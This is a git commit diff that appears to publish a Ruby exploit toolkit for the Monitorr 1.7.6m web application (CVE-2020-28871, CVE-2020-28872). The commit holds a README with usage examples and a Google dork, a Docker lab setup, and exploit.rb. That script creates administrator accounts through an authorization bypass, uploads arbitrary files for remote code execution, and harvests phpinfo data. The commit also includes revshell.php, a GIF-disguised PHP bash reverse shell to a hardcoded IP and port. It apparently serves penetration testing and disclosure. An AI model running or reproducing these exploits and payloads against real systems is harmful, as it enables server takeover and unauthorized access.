1st commit

Author: noraj

.tool-versions

@@ -0,0 +1 @@
+ruby 3.0.1

Gemfile

@@ -0,0 +1,4 @@
+source 'https://rubygems.org'
+
+gem 'docopt', '>= 0.6.1'
+gem 'httpx', '>= 0.14.5'

Gemfile.lock

@@ -0,0 +1,19 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    docopt (0.6.1)
+    http-2-next (0.4.1)
+    httpx (0.14.5)
+      http-2-next (>= 0.4.1)
+      timers
+    timers (4.3.3)
+
+PLATFORMS
+  x86_64-linux
+
+DEPENDENCIES
+  docopt (>= 0.6.1)
+  httpx (>= 0.14.5)
+
+BUNDLED WITH
+   2.2.15

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 Alexandre ZANNI at SEC-IT
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,124 @@
+# Monitorr exploit toolkit
+
+- **RCE** via _unsecure file upload_ (PHP reverse shell, webshell, etc.)
+- **Administrator account creation** via _Authorization bypass_
+- **Technical information leakage**: Monitorr version, PHP version, System version & kernel, PHP config, etc.
+
+Exploit for [CVE-2020-28872][CVE-2020-28872] and [CVE-2020-28871].
+
+## Usage
+
+```
+$ ruby exploit.rb -h
+Monitorr-Exploit
+
+Usage:
+  exploit.rb upload <url> <file> [--debug]
+  exploit.rb create <url> <user> <pass> <email> [--debug]
+  exploit.rb version <url> [--debug]
+  exploit.rb phpinfo <url> [--debug]
+  exploit.rb -h | --help
+
+upload:       Upload a file (RCE via unrestricted file upload)
+version:      Try to fetch Monitorr version
+phpinfo:      Extract main phpinfo() information (Information leakage)
+create:       Create an administrator account (Authorization bypass)
+
+Options:
+  <url>       Root URL (base path) including HTTP scheme, port and root folder
+  <file>      File to be uploaded
+  --debug     Display arguments
+  -h, --help  Show this screen
+
+Examples:
+  exploit.rb upload http://example.org revshell.php
+  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
+  exploit.rb version https://example.org:7000/
+```
+
+## Examples
+
+Upload a reverse shell:
+
+```
+$ ruby exploit.rb upload http://localhost:7000/ shell.php
+[+] File uploaded:
+http://localhost:7000//assets/data/usrimg/shell.php
+```
+
+Administrator account creation:
+
+```
+$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
+[+] User created
+Username: noraj20
+Email: [email protected]
+Password: password
+```
+
+Get Monitorr version:
+
+```
+$ ruby exploit.rb version http://localhost:7000/
+1.7.6m
+```
+
+Get `phpinfp()`:
+
+```
+$ ruby exploit.rb phpinfo http://localhost:7000/
+System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
+PHP version: 7.1.17 
+disable_functions: no value</i>
+open_basedir: no value</i>
+
+Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php
+```
+
+## Requirements
+
+- [httpx](https://gitlab.com/honeyryderchuck/httpx)
+- [docopt.rb](https://github.com/docopt/docopt.rb)
+
+Example using gem:
+
+```bash
+bundle install
+# or
+gem install httpx docopt
+```
+
+## Docker deployment of the vulnerable software
+
+Warning: of course this setup is not suited for production usage!
+
+```
+$ sudo docker-compose up
+```
+
+Setup / initialize the app at http://127.0.0.1:7000/monitorr/settings.php.
+
+## Limitations
+
+- **Upload**: the uploaded file must have an image magic byte (eg. GIF) in order to match [getimagesize](https://www.php.net/manual/en/function.getimagesize.php) ([code](https://github.com/Monitorr/Monitorr/blob/efff8fd71eac6369fa187e02d86341f35790af35/assets/php/upload.php#L7))
+- **Create**: the password used during password creation must be >= 6 characters long (application min. limit)
+
+## References
+
+- Target software: **Monitorr**
+  - Source: https://github.com/Monitorr/Monitorr/
+  - Docker: https://hub.docker.com/r/monitorr/monitorr/
+  - Vulnerable version: 1.7.6m
+
+This is a better re-write & fusion of [EDB-48981][48981] ([CVE-2020-28872][CVE-2020-28872]) and [EDB-48980][48980] ([CVE-2020-28871]) plus extra functionalities.
+
+The upload and admin account creation vulnerabilities were found by [Lyhin's Lab](https://lyhinslab.org/). The phpinfo and Monitorr version leak were found by [Alexandre ZANNI aka noraj](https://pwn.by/noraj/).
+
+Analysis of the original exploit and vulnerability:
+
+- [How White-Box hacking works: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6](https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/)
+
+[48981]:https://www.exploit-db.com/exploits/48981
+[48980]:https://www.exploit-db.com/exploits/48980
+[CVE-2020-28871]:https://nvd.nist.gov/vuln/detail/CVE-2020-28871
+[CVE-2020-28872]:https://nvd.nist.gov/vuln/detail/CVE-2020-28872

docker-compose.yml

@@ -0,0 +1,20 @@
+version: '3'
+
+services:
+  monitorr:
+    image: monitorr/monitorr:latest # should be 1.7.6m as the docker build as been abandonned
+    container_name: monitorr-poc
+    ports:
+      - '127.0.0.1:7000:80'
+    volumes:
+      - type: volume
+        source: monitorr
+        target: /app
+        read_only: false
+    environment:
+      - TZ=Europe/Paris
+      - PGID=1000
+      - PUID=1000
+
+volumes:
+  monitorr:

exploit.rb

@@ -0,0 +1,118 @@
+#!/usr/bin/env ruby
+
+# Exploit
+## Title: Monitorr exploit toolkit
+## Google Dorks:
+##   inurl:/assets/config/_installation/_register.php?action=register
+## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
+## Author website: https://pwn.by/noraj/
+## Date: 2021-06-22
+## Vendor Homepage: https://github.com/Monitorr/Monitorr/
+## Software Link: https://github.com/Monitorr/Monitorr/archive/refs/tags/1.7.6m.tar.gz
+## Version: at least 1.7.6m
+## Tested on: OpenNetAdmin 1.7.6.m
+
+require 'pathname'
+require 'httpx'
+require 'docopt'
+
+doc = <<~DOCOPT
+  Monitorr-Exploit
+
+  Usage:
+    #{__FILE__} upload <url> <file> [--debug]
+    #{__FILE__} create <url> <user> <pass> <email> [--debug]
+    #{__FILE__} version <url> [--debug]
+    #{__FILE__} phpinfo <url> [--debug]
+    #{__FILE__} -h | --help
+
+  upload:       Upload a file (RCE via unrestricted file upload)
+  version:      Try to fetch Monitorr version
+  phpinfo:      Extract main phpinfo() information (Information leakage)
+  create:       Create an administrator account (Authorization bypass)
+
+  Options:
+    <url>       Root URL (base path) including HTTP scheme, port and root folder
+    <file>      File to be uploaded
+    --debug     Display arguments
+    -h, --help  Show this screen
+
+  Examples:
+    #{__FILE__} upload http://example.org revshell.php
+    #{__FILE__} create https://example.org:8080/monitorr/ noraj password '[email protected]'
+    #{__FILE__} version https://example.org:7000/
+DOCOPT
+
+def version(root_url)
+  vuln_url = "#{root_url}/assets/js/version/version.txt"
+
+  HTTPX.get(vuln_url).body.to_s
+end
+
+def phpinfo(root_url)
+  vuln_url = "#{root_url}/assets/php/phpinfo.php"
+
+  res = HTTPX.get(vuln_url).body.to_s
+  sys = res.match(/>System\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
+  phpver = res.match(/>PHP Version\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
+  disablef = res.match(/>disable_functions\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
+  openb = res.match(/>open_basedir\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
+
+  "System: #{sys}\nPHP version: #{phpver}\ndisable_functions: #{disablef}\nopen_basedir: #{openb}\n\n" \
+    "Full phpinfo() location: #{vuln_url}"
+end
+
+# Password size should be >= 6
+def create_user(root_url, username, password, email)
+  vuln_url = "#{root_url}/assets/config/_installation/_register.php?action=register"
+
+  params = {
+    'user_name' => username,
+    'user_email' => email,
+    'user_password_new' => password,
+    'user_password_repeat' => password,
+    'register' => 'Register'
+  }
+
+  success = HTTPX.post(vuln_url, form: params).body.to_s.match?(/User credentials have been created successfully/)
+
+  return '[-] User not created' unless success
+
+  "[+] User created\nUsername: #{username}\nEmail: #{email}\nPassword: #{password}"
+end
+
+def upload(root_url, filepath)
+  vuln_url = "#{root_url}/assets/php/upload.php"
+  pn = Pathname.new(filepath)
+
+  params = {
+    fileToUpload: {
+      content_type: 'image/gif',
+      filename: pn.basename.to_s,
+      body: pn
+    }
+  }
+
+  res = HTTPX.plugin(:multipart).post(vuln_url, form: params)
+
+  return '[-] File not upload' unless (200..299).include?(res.status)
+
+  "[+] File uploaded:\n#{root_url}/assets/data/usrimg/#{pn.basename}"
+end
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+
+  if args['version']
+    puts version(args['<url>'])
+  elsif args['phpinfo']
+    puts phpinfo(args['<url>'])
+  elsif args['create']
+    puts create_user(args['<url>'], args['<user>'], args['<pass>'], args['<email>'])
+  elsif args['upload']
+    puts upload(args['<url>'], args['<file>'])
+  end
+rescue Docopt::Exit => e
+  puts e.message
+end

revshell.php

@@ -0,0 +1 @@
+GIF89a213213123<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'");